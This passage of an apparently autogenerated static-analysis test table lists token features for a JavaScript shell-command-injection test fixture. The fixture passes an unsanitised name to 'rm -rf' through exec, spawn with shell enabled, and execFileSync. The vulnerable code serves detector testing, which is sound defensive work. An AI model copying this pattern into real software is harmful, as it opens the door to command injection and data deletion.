name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:18:418:22 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:25:418:28 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:32:418:44 | {shell: true} | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:32:418:44 | {shell: true} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:32:418:44 | {shell: true} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:32:418:44 | {shell: true} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:32:418:44 | {shell: true} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:32:418:44 | {shell: true} | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:32:418:44 | {shell: true} | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:32:418:44 | {shell: true} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:32:418:44 | {shell: true} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:37 | shell | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:37 | shell | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:37 | shell | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:37 | shell | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:37 | shell | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:33:418:43 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | InputAccessPathFromCallee | 2.shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | assignedToPropName | shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:40:418:43 | true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:3 | cp | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:16 | cp.execFileSync | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:16 | cp.execFileSync | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:16 | cp.execFileSync | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:16 | cp.execFileSync | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:16 | cp.execFileSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | cp.exec ... true}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | cp.exec ... true}) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | cp.exec ... true}) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | cp.exec ... true}) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | cp.exec ... true}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | exceptional return of cp.exec ... true}) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | exceptional return of cp.exec ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | exceptional return of cp.exec ... true}) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | exceptional return of cp.exec ... true}) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | exceptional return of cp.exec ... true}) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:5:419:16 | execFileSync | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:5:419:16 | execFileSync | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:5:419:16 | execFileSync | 